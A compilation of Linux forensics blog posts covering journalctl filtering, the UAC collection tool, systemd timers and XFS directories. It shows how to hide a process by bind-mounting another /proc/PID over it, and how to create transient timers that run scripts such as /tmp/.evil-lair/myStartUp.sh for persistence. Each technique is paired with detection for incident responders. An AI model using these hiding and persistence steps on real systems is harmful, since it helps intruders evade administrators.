In general you can select messages you want to see by matching with “FIELD=value“, e.g. “_UID=1000“. You can specify multiple selectors on the same command line and the journalctl command assumes you want to logically “AND” the selections together (intersection). If you want logical “OR”, use a “+” between field selections, e.g. “_UID=0 + _UID=1000“.

Earlier I mentioned using “-o json-pretty” to help view fields that you might want to match on. “journalctl -N” lists the names of all fields found in the journal file(s), while “journalctl -F FIELD” lists all values found for a particular field:

# journalctl -N | sort
[...]
_SYSTEMD_UNIT
_SYSTEMD_USER_SLICE
_SYSTEMD_USER_UNIT
THREAD_ID
TID
TIMESTAMP_BOOTTIME
TIMESTAMP_MONOTONIC
_TRANSPORT
_UDEV_DEVNODE
_UDEV_SYSNAME
_UID
UNIT
UNIT_RESULT
USER_ID
USER_INVOCATION_ID
USERSPACE_USEC
USER_UNIT
# journalctl -F _UID | sort -n
0
101
104
105
107
110
114
117
1000
62803

Piping the output of “-F” and “-N” into sort is highly recommended.

Commonly matched fields have shortcut options:

--facility=   Matches on Syslog facility name or number
    journalctl -q -o short --facility=authpriv
    (Gives output just like typical /var/log/auth.log files)

-t            Matches SYSLOG_IDENTIFIER field
    journalctl -q -o short -t sudo
    (When you just want to see messages from Sudo)

-u            Matches _SYSTEMD_UNIT field
    journalctl -q -o short -u ssh.service
    (Messages from sshd, the ".service" is optional)

You can also do pattern matching against the log message text using the “-g” (“grep“) option. This option uses PCRE2 regular expression syntax. You might find this regular expression tester useful.

Options can be combined in any order:

# journalctl -q -r --utc -o short-iso -u ssh -g Accepted
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-20T21:55:45+0000 LAB sshd[1559]: Accepted password for lab from 192.168.10.1 port 56278 ssh2
2024-07-20T21:44:55+0000 LAB sshd[1386]: Accepted password for lab from 192.168.10.1 port 56376 ssh2
[...]

TIME-BASED SELECTIONS

Specify time ranges with the “-S” (or “--since“) and “-U” (“--until“) options. The syntax for specifying dates and times is ridiculously flexible and is defined in the systemd.time(7) manual page. Here are some examples:

-S 2024-08-07 09:30:00
-S 2024-07-24
-U yesterday
-U “15 minutes ago”
-S -1hr
-S 2024-07-24 -U yesterday

The Systemd journal also keeps track of when the system reboots and allows you to select messages that happened during a particular operating sessions of the machine. “--list-boots” gives a list of all of the reboots found in the current journal files and “-b” allows you to select one or more sessions:

# journalctl --list-boots
 -3 f366a96b2f0a402a94e02eb57e10d431 Sun 2024-07-14 16:18:40 EDT—Thu 2024-07-18 08:53:12 EDT
 -2 9ac272cac6c040a7b9ad021ba32c2574 Thu 2024-07-18 08:53:45 EDT—Sat 2024-07-20 08:55:50 EDT
 -1 93616c3bb5794e0099520b2bf974d1bc Sat 2024-07-20 17:41:24 EDT—Sun 2024-07-21 07:17:12 EDT
  0 5c57e83c3abd457c95d0695807667c9e Sun 2024-07-21 07:17:40 EDT—Sun 2024-07-21 14:17:52 EDT
# journalctl -q -r --utc -o short-iso -u ssh -g Accepted -b -1
2024-07-20T21:55:45+0000 LAB sshd[1559]: Accepted password for lab from 192.168.10.1 port 56278 ssh2
2024-07-20T21:44:55+0000 LAB sshd[1386]: Accepted password for lab from 192.168.10.1 port 56376 ssh2

TAIL-LIKE BEHAVIORS

When using journalctl on a live system, “journalctl -f” allows you to watch messages coming into the logs in real time. This is similar to using “tail -f” on a traditional Syslog-style log. You may still use all of the normal selectors to filter messages you want to watch for, as well as specify the usual output formats.

journalctl -n” displays the last ten entries in the journal, similar to piping the output into tail. You may optionally specify a numeric argument after “-n” if you want to see more or less than ten lines.

However, the “-n” and “-g” (pattern matching) operators have a strange interaction. The pattern match is only applied to the lines selected by “-n” along with your other selectors. For example, we can extract the last ten lines associated with the SSH service:

# journalctl -q --utc -o short-iso -u ssh -n
2024-07-21T11:17:41+0000 LAB systemd[1]: Starting OpenBSD Secure Shell server...
2024-07-21T11:17:42+0000 LAB sshd[723]: Server listening on 0.0.0.0 port 22.
2024-07-21T11:17:42+0000 LAB sshd[723]: Server listening on :: port 22.
2024-07-21T11:17:42+0000 LAB systemd[1]: Started OpenBSD Secure Shell server.
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-21T11:22:02+0000 LAB sshd[1304]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T11:33:36+0000 LAB sshd[1478]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)
2024-07-21T19:56:09+0000 LAB sshd[4013]: Accepted password for lab from 192.168.10.1 port 56284 ssh2
2024-07-21T19:56:09+0000 LAB sshd[4013]: pam_unix(sshd:session): session opened for user lab(uid=1000) by (uid=0)

But matching the lines containing the “Accepted” keyword only matches against the ten lines shown above:

# journalctl -q --utc -o short-iso -u ssh -g Accepted -n
2024-07-21T11:22:02+0000 LAB sshd[1304]: Accepted password for lab from 192.168.10.1 port 56280 ssh2
2024-07-21T11:33:36+0000 LAB sshd[1478]: Accepted password for lab from 192.168.10.1 port 56282 ssh2
2024-07-21T19:56:09+0000 LAB sshd[4013]: Accepted password for lab from 192.168.10.1 port 56284 ssh2

From an efficiency perspective I understand this choice. It’s costly to seek backwards through the journal doing pattern matches until you find ten lines that match your regular expression. But it’s certainly surprising behavior, especially when your pattern match returns zero matching lines because it doesn’t happen to get a hit in the last ten lines you selected.

Frankly, I just forget about the “-n” option and just pipe my journalctl output into tail.

Further Reading

I’ve attempted to summarize the information most important to DFIR professionals, but there is always more to know. For further information, start with the journalctl(1) manual page. Keep your journalctl cheat sheet handy and good luck out there!

Hiding Linux Processes with Bind Mounts

Lately I’ve been thinking about Stephan Berger’s recent blog post on hiding Linux processes with bind mounts. Bottom line here is that if you have an evil process you want to hide, use a bind mount to mount a different directory on top of the /proc/PID directory for the evil process.

In the original article, Stephan uses a nearly empty directory to overlay the original /proc/PID directory for the process he is hiding. I started thinking about how I could write a tool that would populate a more realistic looking spoofed directory. But after doing some prototypes and running into annoying complexities I realized there is a much easier approach.

Why try and make my own spoofed directory when I can simply use an existing /proc/PID directory from some other process? If you look at typical Linux ps output, there are lots of process entries that would hide our evil process quite well:

root@LAB:~# ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 Jul23 ?        00:00:12 /sbin/init
root           2       0  0 Jul23 ?        00:00:00 [kthreadd]
root           3       2  0 Jul23 ?        00:00:00 [rcu_gp]
root           4       2  0 Jul23 ?        00:00:00 [rcu_par_gp]
[...]
root          73       2  0 Jul23 ?        00:00:00 [irq/24-pciehp]
root          74       2  0 Jul23 ?        00:00:00 [irq/25-pciehp]
root          75       2  0 Jul23 ?        00:00:00 [irq/26-pciehp]
root          76       2  0 Jul23 ?        00:00:00 [irq/27-pciehp]
root          77       2  0 Jul23 ?        00:00:00 [irq/28-pciehp]
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]
root          79       2  0 Jul23 ?        00:00:00 [irq/30-pciehp]

These process entries with low PIDs and process names in square brackets (“[somename]“) are spontaneous processes. They aren’t running executables in the traditional sense– you won’t find a binary in your operating system called kthreadd for example. Instead, these are essentially kernel code dressed up to look like a process so administrators can monitor various subsystems using familiar tools like ps.

From our perspective, however, they’re a bunch of processes that administrators generally ignore and which have names that vary only slightly from one another. They’re perfect for hiding our evil processes:

root@LAB:~# ps -ef | grep myevilprocess
root        4867       1  0 Jul23 pts/0    00:00:16 myevilprocess
root@LAB:~# mount -B /proc/78 /proc/4867
root@LAB:~# ps -ef | grep 4867

Our evil process is now completely hidden. If somebody were to look closely at the ps output, they would discover there are now two entries for PID 78:

root@LAB:~# ps -ef | awk '$2 == 78'
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]
root          78       2  0 Jul23 ?        00:00:00 [irq/29-pciehp]

My guess is that nobody is going to notice this unless they are specifically looking for this technique. And if they are aware of this technique, there’s a much simpler way of detecting it which Stephan notes in his original article:

root@LAB:~# cat /proc/mounts | grep /proc
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
systemd-1 /proc/sys/fs/binfmt_misc autofs rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=424 0 0
proc /proc/4867 proc rw,nosuid,nodev,noexec,relatime 0 0

The last line above is a dead giveaway that something hinky is going on.

We can refine Stephan’s approach:

root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur
/proc/4867

Just to be thorough, I’m dumping the content of all /proc/*/mount entries (/proc/mounts is a link to /proc/self/mounts) and looking for ones where the mount point is a /proc/PID directory or one of its subdirectories. The “sort -ur” at the end gives us one instance of each unique mount point.

But why the “-r” option? I want to use my output to programmatically unmount the bind mounted directories. I was worried about somebody doing a bind mount on top of a bind mount:

root@LAB:~# mount -B /proc/79/fd /proc/4867/fd
root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur
/proc/78/fd
/proc/4867/fd
/proc/4867
root@LAB:~# cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur | 
    while read dir; do umount $dir; done
umount: /proc/4867/fd: not mounted.
root@LAB:~# ps -ef | grep myevilprocess
root        4867       1  0 Jul23 pts/0    00:00:16 myevilprocess

While I think this scenario is extremely unlikely, using “sort -ur” means that the mount points are returned in the proper order to be unmounted. And once the bind mounts are umounted, we can see the evil process again.

Note that we do get an error here. /proc/78 is mounted on top of /proc/4867. So when we unmount /proc/78/fd we are also taking care of the spoofed path /proc/4867/fd. When our while loop gets to the entry for /proc/4867/fd, the umount command errors out.

Possible weird corner cases aside, let’s try and provide our analyst with some additional information:

root@LAB:~# function procbindmounts {
  cat /proc/*/mounts | awk '$2 ~ /^\/proc\/[0-9]*($|\/)/ { print $2 }' | sort -ur | 
    while read dir; do 
        echo ===== POSSIBLE PROCESS HIDING $dir
        echo -ne Overlay:\\t
        cut -d' ' -f1-7 $dir/stat
        umount $dir
        echo -ne Hidden:\\t\\t
        cut -d' ' -f1-7 $dir/stat
    done
}
root@LAB:~# mount -B /proc/78 /proc/4867
root@LAB:~# procbindmounts
===== POSSIBLE PROCESS HIDING /proc/4867
Overlay:        78 (irq/29-pciehp) S 2 0 0 0
Hidden:         4867 (myevilprocess) S 1 4867 4759 34816

Thanks Stephan for getting my creative juices flowing. This is a fun technique for all you red teamers out there, and a good trick for all you blue team analysts.

Working With UAC

In my last blog post, I covered Systemd timers and some of the forensic artifacts associated with them. I’m also a fan of Thiago Canozzo Lahr’s UAC tool for collecting artifacts during incident response. So I wanted to add the Systemd timer artifacts covered in my blog post to UAC. And it occurred to me that others might be interested in seeing how to modify UAC to add new artifacts for their own purposes.

UAC is a module-driven tool for collecting artifacts from Unix-like systems (including Macs). The user specifies a profile file containing the list of artifacts they want to collect and an output directory where that collection should occur. Individual artifacts may be added to or excluded from the list of artifacts in the profile file using individual command line arguments.

A typical UAC command might look like:

./uac -p ir_triage -a memory_dump/avml.yaml /root

Here we are selecting the standard ir_triage profile included with UAC (“-p ir_triage“) and adding a memory dump (“-a memory_dump/avml.yaml“) to the list of artifacts to be collected. Output will be collected in the /root directory.

UAC’s configuration files are simple YAML configuration files and can be easily customized and modified to fit your needs. Adding new artifacts usually means adding a few lines to existing configuration files, or rarely creating a new configuration module from scratch. I’m going to walk through a few examples, including showing you how I added the Systemd timer artifacts to UAC.

Before we get started, let’s go ahead and check out the latest version from Thiago’s Github:

$ git clone https://github.com/tclahr/uac.git
Cloning into 'uac'...
remote: Enumerating objects: 5184, done.
remote: Counting objects: 100% (943/943), done.
remote: Compressing objects: 100% (284/284), done.
remote: Total 5184 (delta 661), reused 857 (delta 630), pack-reused 4241
Receiving objects: 100% (5184/5184), 32.29 MiB | 26.11 MiB/s, done.
Resolving deltas: 100% (3481/3481), done.
$ cd uac
$ ls
artifacts bin CHANGELOG.md CODE_OF_CONDUCT.md config CONTRIBUTING.md DCO-1.1.txt lib LICENSE LICENSES.md MAINTAINERS.md profiles README.md tools uac

The profiles directory contains the YAML formated profile files, including the ir_triage.yaml profile I referenced in my sample UAC command above:

$ ls profiles/
full.yaml  ir_triage.yaml  offline.yaml

The artifacts directory is an entire hierarchy of dozens of YAML files describing how to collect artifacts:

$ ls artifacts/
bodyfile  chkrootkit  files  hash_executables  live_response  memory_dump
$ ls artifacts/memory_dump/
avml.yaml  process_memory_sections_strings.yaml  process_memory_strings.yaml

Modifying Profiles

While the default profiles that come with UAC are excellent starting points, you will often find yourself needing to tweak the list of artifacts you wish to collect. This can be done with the “-a” command line argument as noted above. But if you find yourself collecting the same custom list of artifacts over and over, it becomes easier to create your own profile file with your specific list of desired artifacts.

For example, let’s suppose were were satisfied with the basic list of artifacts in the ir_triage profile, but wanted to make sure we always tried to collect a memory image. Rather than adding “-a memory_dump/avml.yaml” to every UAC command, we could create a modified version of the ir_triage profile that simply includes this artifact.

First make a copy of the ir_triage profile under a new name:

$ cp profiles/ir_triage.yaml profiles/ir_triage_memory.yaml

Now edit the ir_triage_memory.yaml file and make the changes shown below in bold:

name: ir_triage_memory
description: Incident response triage collection.
artifacts:
  - memory_dump/avml.yaml
  - live_response/process/ps.yaml
  - live_response/process/lsof.yaml
  - live_response/process/top.yaml
  - live_response/process/procfs_information.yaml
[... snip ...]

You can see where we added the “memory_dump/avml.yaml” artifact right at the top of the list of artifacts to collect. It is also extremely important to modify the “name:” line at the top of the file so that this name matches the name of the YAML file for the profile (without the “.yaml” extension). UAC will exit with an error if the “name:” line doesn’t match the base name of the profile file you are trying to use.

Now that we have our new profile file, we can invoke it as “./uac -p ir_triage_memory /root“.

Adding Artifacts

To add specific artifacts, you will need to get into the YAML files under the “artifacts” directory. In my previous blog posting, I suggested collecting the output of “systemctl list-timers --all” and “systemctl status *.timers“. You’ll often be surprised to find that UAC is already collecting the artifact you are looking for:

$ grep -rl systemctl artifacts
artifacts/live_response/system/systemctl.yaml

Here is the original systemctl.yaml file:

version: 1.0
artifacts:
  -
    description: Display all systemd system units.
    supported_os: [linux]
    collector: command
    command: systemctl list-units
    output_file: systemctl_list-units.txt
  -
    description: Display timer units currently in memory, ordered by the time they elapse next.
    supported_os: [linux]
    collector: command
    command: systemctl list-timers --all
    output_file: systemctl_list-timers_--all.txt
  -
    description: Display unit files installed on the system, in combination with their enablement state (as reported by is-enabled).
    supported_os: [linux]
    collector: command
    command: systemctl list-unit-files
    output_file: systemctl_list-unit-files.txt

It looks like “systemctl list-timers --all” is already being collected. Following the pattern of the other entries, it’s easy to add in the configuration to collect “systemctl status *.timers“:

version: 1.1
artifacts:
  -
    description: Display all systemd system units.
    supported_os: [linux]
    collector: command
    command: systemctl list-units
    output_file: systemctl_list-units.txt
  -
    description: Display timer units currently in memory, ordered by the time they elapse next.
    supported_os: [linux]
    collector: command
    command: systemctl list-timers --all
    output_file: systemctl_list-timers_--all.txt
  -
    description: Get status from all timers, including logs
    supported_os: [linux]
    collector: command
    command: systemctl status *.timer
    output_file: systemctl_status_timer.txt
  -
    description: Display unit files installed on the system, in combination with their enablement state (as reported by is-enabled).
    supported_os: [linux]
    collector: command
    command: systemctl list-unit-files
    output_file: systemctl_list-unit-files.txt

Note that I was careful to update the “version:” line at the top of the file to reflect the fact that the file was changing.

As far as the various file artifacts we need to collect, I discovered that artifacts/files/system/systemd.yaml was already collecting many of the files we want:

version: 2.0
artifacts:
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /usr/lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd sessions files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/sessions
    file_type: f
  -
    description: Collect systemd scope and transient timer files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/transient
    name_pattern: ["*.scope"]

I just needed to add some configuration to collect transient timer files and per-user configuration files:

version: 2.1
artifacts:
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd configuration files.
    supported_os: [linux]
    collector: file
    path: /usr/lib/systemd/system
    ignore_date_range: true
  -
    description: Collect systemd sessions files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/sessions
    file_type: f
  -
    description: Collect systemd scope and transient timer files.
    supported_os: [linux]
    collector: file
    path: /run/systemd/transient
    name_pattern: ["*.scope", "*.timer", "*.service"]
  -
    description: Collect systemd per-user transient timers.
    supported_os: [linux]
    collector: file
    path: /run/user/*/systemd/transient
    name_pattern: ["*.timer", "*.service"]
  -
    description: Collect systemd per-user configuration.
    supported_os: [linux]
    collector: file
    path: /%user_home%/.config/systemd

The full UAC configuration syntax is documented in the UAC documentation.

But what if I made a mistake in my syntax? Happily, UAC includes a “--validate-artifacts-file” switch to check for errors:

$ ./uac --validate-artifacts-file ./artifacts/live_response/system/systemctl.yaml
uac: artifacts file './artifacts/live_response/system/systemctl.yaml' successfully validated.
$ ./uac --validate-artifacts-file ./artifacts/files/system/systemd.yaml
uac: artifacts file './artifacts/files/system/systemd.yaml' successfully validated.

In this case my changes only involved modifying existing artifacts files. If I had found it necessary to create new YAML files I would have also needed to add those new artifact files to my preferred UAC profile.

Sharing is Caring

If you add new artifacts to your local copy of UAC, please consider contributing them back to the project. The process for submitting a pull request is documented in the CONTRIBUTING.md document.

Systemd Timers

You know what Linux needs? Another task scheduling system!

said nobody ever

Important Artifacts

Command output:

  • systemctl list-timers --all
  • systemctl status *.timers

File locations:

  • /usr/lib/systemd/system/*.{timer,service}
  • /etc/systemd/system
  • $HOME/.config/systemd
  • [/var]/run/systemd/transient/*.{timer,service}
  • [/var]/run/user/*/systemd/transient/*.{timer,service}

Also Syslog logs sent to LOG_CRON facility.

The Basics

If you’ve been busy trying to get actual work done on your Linux systems, you may have missed the fact that Systemd continues its ongoing scope creep and has added timers. Systemd timers are a new task scheduling system that provide similar functionality to the existing cron (Vixie cron and anacron) and atd systems in Linux. And so this creates another mechanism that attackers can leverage for malware activation and persistence.

Systemd timers provide both ongoing scheduled tasks similar to cron jobs (what the Systemd documentation calls realtime timers) as well as one-shot scheduled tasks (monotomic timers) that are similar to atd style jobs. Standard Systemd timers are configured via two files: a *.timer file and a *.service file. These files must live in standard Systemd configuration directories like /usr/lib/systemd/system or /etc/systemd/system.

The *.timer file generally contains information about when and how the scheduled task will run. Here’s an example from the logrotate.timer file on my local Debian system:

[Unit]
Description=Daily rotation of log files
Documentation=man:logrotate(8) man:logrotate.conf(5)

[Timer]
OnCalendar=daily
AccuracySec=1h
Persistent=true

[Install]
WantedBy=timers.target

This timer is configured to run daily within a one hour (AccuracySec=1h) random time window that Systemd deems is the most efficient time. Persistent=true means that the last time the timer ran will be tracked on disk. If the system sleeps during a period when this timer should have been activated, then the timer will run immediately on system wakeup. This is similar functionality to the traditional Anacron system in Linux.

The *.timer file may include a Unit= directive that specifies a *.service file to execute when the timer must run. However, as in this case, most *.timer files leave out the Unit= directive, which means that the timer will activate the corresponding logrotate.service file. The *.service file configures the program(s) the timer executes and other job parameters and security settings. Here’s the logrotate.service file from my Debian machine:

[Unit]
Description=Rotate log files
Documentation=man:logrotate(8) man:logrotate.conf(5)
RequiresMountsFor=/var/log
ConditionACPower=true

[Service]
Type=oneshot
ExecStart=/usr/sbin/logrotate /etc/logrotate.conf

# performance options
Nice=19
IOSchedulingClass=best-effort
IOSchedulingPriority=7

# hardening options
#  details: https://www.freedesktop.org/software/systemd/man/systemd.exec.html
#  no ProtectHome for userdir logs
#  no PrivateNetwork for mail deliviery
#  no NoNewPrivileges for third party rotate scripts
#  no RestrictSUIDSGID for creating setgid directories
LockPersonality=true
MemoryDenyWriteExecute=true
PrivateDevices=true
PrivateTmp=true
ProtectClock=true
ProtectControlGroups=true
ProtectHostname=true
ProtectKernelLogs=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectSystem=full
RestrictNamespaces=true
RestrictRealtime=true

Timers can be activated using the typical systemctl command line interface:

# systemctl enable logrotate.timer
Created symlink /etc/systemd/system/timers.target.wants/logrotate.timer → /lib/systemd/system/logrotate.timer.
# systemctl start logrotate.timer

systemctl enable ensures the timer will be reactivated across reboots while systemctl start ensures that the timer is started in the current OS session.

You can get a list of all timers configured on the system (active or not) with systemctl list-timers --all:

# systemctl list-timers --all
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2024-05-05 18:33:46 UTC 1h 1min left Sun 2024-05-05 17:30:29 UTC 1min 58s ago anacron.timer anacron.service
Sun 2024-05-05 19:50:01 UTC 2h 17min left Sun 2024-05-05 16:37:36 UTC 54min ago apt-daily.timer apt-daily.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago exim4-base.timer exim4-base.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago logrotate.timer logrotate.service
Mon 2024-05-06 00:00:00 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago man-db.timer man-db.service
Mon 2024-05-06 00:17:20 UTC 6h left Sun 2024-05-05 16:37:36 UTC 54min ago fwupd-refresh.timer fwupd-refresh.service
Mon 2024-05-06 01:13:52 UTC 7h left Sun 2024-05-05 16:37:36 UTC 54min ago fstrim.timer fstrim.service
Mon 2024-05-06 03:23:47 UTC 9h left Fri 2024-04-19 00:59:27 UTC 2 weeks 2 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2024-05-06 06:02:06 UTC 12h left Sun 2024-05-05 16:37:36 UTC 54min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2024-05-12 03:10:20 UTC 6 days left Sun 2024-05-05 16:37:36 UTC 54min ago e2scrub_all.timer e2scrub_all.service

10 timers listed.

systemctl status can give you details about a specific timer, including the full path to where the *.timer file lives and any related log output:

# systemctl status logrotate.timer
● logrotate.timer - Daily rotation of log files
     Loaded: loaded (/lib/systemd/system/logrotate.timer; enabled; vendor preset: enabled)
     Active: active (waiting) since Thu 2024-04-18 00:44:25 UTC; 2 weeks 3 days ago
    Trigger: Mon 2024-05-06 00:00:00 UTC; 6h left
   Triggers: ● logrotate.service
       Docs: man:logrotate(8)
             man:logrotate.conf(5)

Apr 18 00:44:25 LAB systemd[1]: Started Daily rotation of log files.

Note that systemctl status *.timer will give this output for all timers on the system. This would be appropriate if you are quickly trying to gather this information for later triage.

If the command triggered by your timer produces output, look for that output with systemctl status <yourtimer>.service. For example:

# systemctl status anacron.service
● anacron.service - Run anacron jobs
     Loaded: loaded (/lib/systemd/system/anacron.service; enabled; vendor preset: enabled)
     Active: inactive (dead) since Sun 2024-05-05 18:34:45 UTC; 28min ago
TriggeredBy: ● anacron.timer
       Docs: man:anacron
             man:anacrontab
    Process: 1563 ExecStart=/usr/sbin/anacron -d -q $ANACRON_ARGS (code=exited, status=0/SUCCESS)
   Main PID: 1563 (code=exited, status=0/SUCCESS)
        CPU: 2ms

May 05 18:34:45 LAB systemd[1]: Started Run anacron jobs.
May 05 18:34:45 LAB systemd[1]: anacron.service: Succeeded.

Systemd timer executions and command output are also logged to the LOG_CRON Syslog facility.

Transient Timers

Timers can be created on-the-fly without explicit *.timer and *.service files using the systemd-run command:

# systemd-run --on-calendar='*-*-* *:*:15' /tmp/.evil-lair/myStartUp.sh
Running timer as unit: run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
Will run service as unit: run-rb68ce3d3c11a4ec79b508036776d2cb1.service

In this case, we are creating a timer that will run every minute of every hour of every day at 15 seconds into the minute. The timer will execute /tmp/.evil-lair/myStartUp.sh. Note that the systemd-run command requires that /tmp/.evil-lair/myStartUp.sh exist and be executable.

The run-*.timer and run-*.service files end up in [/var]/run/systemd/transient:

# cd /run/systemd/transient/
# ls
run-rb68ce3d3c11a4ec79b508036776d2cb1.service  run-rb68ce3d3c11a4ec79b508036776d2cb1.timer  session-2.scope  session-71.scope  session-c1.scope
# cat run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
# This is a transient unit file, created programmatically via the systemd API. Do not edit.
[Unit]
Description=/tmp/.evil-lair/myStartUp.sh

[Timer]
OnCalendar=*-*-* *:*:15
RemainAfterElapse=no
# cat run-rb68ce3d3c11a4ec79b508036776d2cb1.service
# This is a transient unit file, created programmatically via the systemd API. Do not edit.
[Unit]
Description=/tmp/.evil-lair/myStartUp.sh

[Service]
ExecStart="/tmp/.evil-lair/myStartUp.sh"

These transient timers can be monitored with systemctl list-timers and systemctl status just like any other timer:

# systemctl list-timers --all -l
NEXT                        LEFT          LAST                        PASSED             UNIT                                        ACTIVATES
Sun 2024-05-05 17:59:15 UTC 17s left      Sun 2024-05-05 17:58:19 UTC 37s ago            run-rb68ce3d3c11a4ec79b508036776d2cb1.timer run-rb68ce3d3c11a4ec79b508036776d2cb1.service
Sun 2024-05-05 18:33:46 UTC 34min left    Sun 2024-05-05 17:30:29 UTC 28min ago          anacron.timer                               anacron.service
Sun 2024-05-05 19:50:01 UTC 1h 51min left Sun 2024-05-05 16:37:36 UTC 1h 21min ago       apt-daily.timer                             apt-daily.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       exim4-base.timer                            exim4-base.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       logrotate.timer                             logrotate.service
Mon 2024-05-06 00:00:00 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       man-db.timer                                man-db.service
Mon 2024-05-06 00:17:20 UTC 6h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       fwupd-refresh.timer                         fwupd-refresh.service
Mon 2024-05-06 01:13:52 UTC 7h left       Sun 2024-05-05 16:37:36 UTC 1h 21min ago       fstrim.timer                                fstrim.service
Mon 2024-05-06 03:23:47 UTC 9h left       Fri 2024-04-19 00:59:27 UTC 2 weeks 2 days ago systemd-tmpfiles-clean.timer                systemd-tmpfiles-clean.service
Mon 2024-05-06 06:02:06 UTC 12h left      Sun 2024-05-05 16:37:36 UTC 1h 21min ago       apt-daily-upgrade.timer                     apt-daily-upgrade.service
Sun 2024-05-12 03:10:20 UTC 6 days left   Sun 2024-05-05 16:37:36 UTC 1h 21min ago       e2scrub_all.timer                           e2scrub_all.service

11 timers listed.
# systemctl status run-rb68ce3d3c11a4ec79b508036776d2cb1.timer
● run-rb68ce3d3c11a4ec79b508036776d2cb1.timer - /tmp/.evil-lair/myStartUp.sh
     Loaded: loaded (/run/systemd/transient/run-rb68ce3d3c11a4ec79b508036776d2cb1.timer; transient)
  Transient: yes
     Active: active (waiting) since Sun 2024-05-05 17:48:25 UTC; 10min ago
    Trigger: Sun 2024-05-05 17:59:15 UTC; 3s left
   Triggers: ● run-rb68ce3d3c11a4ec79b508036776d2cb1.service

May 05 17:48:25 LAB systemd[1]: Started /tmp/.evil-lair/myStartUp.sh.

Note that these timers are transient because the /var/run directory is an in-memory file system. These timers, like the file system itself, will disappear on system shutdown or reboot.

Per-User Timers

Systemd also allows unprivileged users to create timers. The command line interface we’ve seen so far stays essentially the same except that regular users must add the --user flag to all commands. User *.timer and *.service files must be placed in $HOME/.config/systemd/user. Or the user could create a transient timer without explicit *.timer and *.service files:

$ systemd-run --user --on-calendar='*-*-* *:*:30' /tmp/.dropper/.src.sh
Running timer as unit: run-rdad04b63554a4ebeb12bc5ca42baaa31.timer
Will run service as unit: run-rdad04b63554a4ebeb12bc5ca42baaa31.service

The user can use systemctl list-timers and systemctl status to check on their timers:

$ systemctl list-timers --user --all
NEXT                        LEFT     LAST PASSED UNIT                                        ACTIVATES
Sun 2024-05-05 18:20:30 UTC 40s left n/a  n/a    run-rdad04b63554a4ebeb12bc5ca42baaa31.timer run-rdad04b63554a4ebeb12bc5ca42baaa31.service

1 timers listed.
$ systemctl status --user run-rdad04b63554a4ebeb12bc5ca42baaa31.timer
● run-rdad04b63554a4ebeb12bc5ca42baaa31.timer - /tmp/.dropper/.src.sh
     Loaded: loaded (/run/user/1000/systemd/transient/run-rdad04b63554a4ebeb12bc5ca42baaa31.timer; transient)
  Transient: yes
     Active: active (waiting) since Sun 2024-05-05 18:19:35 UTC; 32s ago
    Trigger: Sun 2024-05-05 18:20:30 UTC; 22s left
   Triggers: ● run-rdad04b63554a4ebeb12bc5ca42baaa31.service

May 05 18:19:35 LAB systemd[1293]: Started /tmp/.dropper/.src.sh.

As you can see in the above output, transient per-user run-*.timer and run-*.service files end up under [/var]/run/user/<UID>/systemd/transient.

Unfortunately, there does not seem to be a way for the administrator to conveniently query timers for regular users on the system. You’re left with consulting the system logs and grabbing whatever on-disk artifacts you can, like the user’s $HOME/.config/systemd directory.

XFS Part 6 – B+Tree Directories

Look here for earlier posts in this series.

Just to see what would happen, I created a directory containing 5000 files. Let’s start with the inode:

B+Tree Directory

The number of extents (bytes 76-79) is 0x2A, or 42. This is too many extents to fit in an extent array in the inode. The data fork type (byte 5) is 3, which means the data fork is the root of a B+Tree.

The root of the B+Tree starts at byte offset 176 (0x0B0), right after the inode core. The first two bytes are the level of this node in the tree. The value 1 indicates that this is an interior node in the tree, rather than a leaf node. The next two bytes are the number of entries in the arrays which track the nodes below us in the tree– there is only one node and one array entry. Four padding bytes are used to maintain 64-bit alignment.

